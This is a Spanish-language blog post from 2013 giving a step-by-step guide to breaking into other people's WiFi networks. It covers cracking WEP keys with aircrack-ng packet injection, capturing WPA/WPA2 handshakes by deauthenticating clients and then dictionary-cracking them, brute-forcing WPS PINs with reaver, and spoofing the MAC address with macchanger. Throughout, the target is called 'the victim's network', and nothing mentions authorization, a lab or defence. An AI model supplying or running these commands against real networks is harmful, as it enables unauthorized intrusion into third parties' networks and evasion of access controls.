lunes, 25 de marzo de 2013

COMO METERSE A UNA RED WIFI

PARA UNA RED WIFI CON SEGURIDAD WEP

Usando un live-cd de linux BackTrack 5, lo primero que debemos hacer es abrir una terminal de comandos y escribir lo siguiente:
airmon-ng
con este comando podemos ver las interfaces de red que tenemos instalados en nuestro equipo, por lo general la que utilizamos es la wlan0.
ya que conocemos el nombre de nuestra interfaz procedemos a ponerla en modo monitor escribiendo lo siguiente:
airmon-ng start wlan0
ya tenemos nuestra tarjeta en modo monitor y como se dan cuenta "mon0" es el nombre de la interfaz en modo monitor.
ahora escaneamos las redes disponibles con el siguiente comando:
airodump-ng mon0
con este comando nos empieza a mostrar las redes disponibles, para seleccionar la red de la victima tenemos que pulsar ctrl+c.
luego abrimos otra ventana de terminal para capturar la red de la victima y escribimos el siguiente comando:
airodump-ng -w captura -c 11 --bssid 00:11:22:33:44:55 mon0
donde:

-w: especifica el nombre del archivo donde se guarda la captura de datos
-c: especifica el canal de la red
--bssid: especifica la MAC del punto de acceso
-mon0: especifica la interfaz de la tarjeta de red en modo monitoreo

ahora abrimos otra terminal y escribimos lo siguiente:
aireplay-ng -1 0 -a 00:11:22:33:44:55 mon0
esto es para asociar su pc con la red victima

ahora pasamos a inyectar paquetes a la red victima para esto escribimos lo siguiente:
aireplay-ng -3 -b 00:11:22:33:44:55 mon0
con esto enviaremos y recibiremos paquetes, ahora vamos a la segunda terminal y en la columna #Data se incrementara rapidamente y solo tenemos que esperar a que llegue a 30.000 datos para poder desencriptar la clave.
cuando llegue a los 30.000 datos abrimos una ultima terminal y escribimos lo siguiente:
aircrack-ng captura-01.cap
donde:
-captura: es el nombre de archivo que le dimos para capturar la red de la victima
y listo, cuando le den enter les va a salor algo como
Key Found (00:09:7F:...)

aqui les dejo el video donde lo encontre



PARA UNA RED WIFI CON SEGURIDAD WPA O WPA2

Usando un live-cd de linux BackTrack 5, lo primero que debemos hacer es abrir una terminal de comandos y escribir lo siguiente:
airmon-ng
con este comando podemos ver las interfaces de red que tenemos instalados en nuestro equipo, por lo general la que utilizamos es la wlan0.
ya que conocemos el nombre de nuestra interfaz procedemos a ponerla en modo monitor escribiendo lo siguiente:
airmon-ng start wlan0
ya tenemos nuestra tarjeta en modo monitor y como se dan cuenta "mon0" es el nombre de la interfaz en modo monitor.
ahora escaneamos las redes disponibles con el siguiente comando:
airodump-ng mon0
con este comando nos empieza a mostrar las redes disponibles, para seleccionar la red de la victima tenemos que pulsar ctrl+c.
luego abrimos otra ventana de terminal para capturar el handshake de la red de la victima y escribimos el siguiente comando:
airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w captura mon0
ahora usaremos aireplay-ng para desautenticar un cliente conectado escribiendo el siguiente comando
aireplay-ng -0 1 -a MAC_DEL_AP -c MAC_DEL_CLIENTE mon0
despues usamos aircrack para desencriptar la clave con el siguiente comando
aircrack-ng -w diccionario.lst -b MAC_DEL_AP captura*.cap

en la siguiente pagina encontraras la explicacion del uso de estas herramientas de un modo mas detallado
http://foro.undersecurity.net/read.php?80,928

OTRA MANERA DE INGRESAR A UNA WPA O WPA2

otra manera de sacar la clave en una red WIFI protegida con WPA o WPA2 es utilizando el comando "reaver" de la siguiente manera:

1) Actualizar los paquetes del S.O.
apt-get update
2) Instalamos el paquete "reaver" con el comando:
apt-get install reaver
3) Iniciamos el modo monitor con el comando:
airmon-ng start wlan0
4) Iniciamos la escucha de las redes a las que se les puede hacer el ataque de pines(reaver) asi:
wash -C -i wlan0mon
    se identifican las que digan No en WPS Loked
5) En otra ventana hacemos el ataque con el comando:
reaver -i wlan0mon -b MAC_DEL_AP -c CANAL_DEL_AP -N -S -x 60 -r 3:10 -vv
se puede variar el -r 3:10 (cada 3 intentos esperar 10 segundos)
listo es solo cuestion de tiempo para que nos diga cual es la clave(PSK)

PARA CAMBIAR LA MAC

Para cambiar la MAC usaremos el comando "macchanger" de la siguiente manera:

1) desactivar la antena wifi con:
ifconfig mon0 down
2) cambiar la mac con:
macchanger -m 00:11:22:33:44:55 mon0
3) activamos de nuevo la antena wifi con:
ifconfig mon0 up 

No hay comentarios:

Publicar un comentario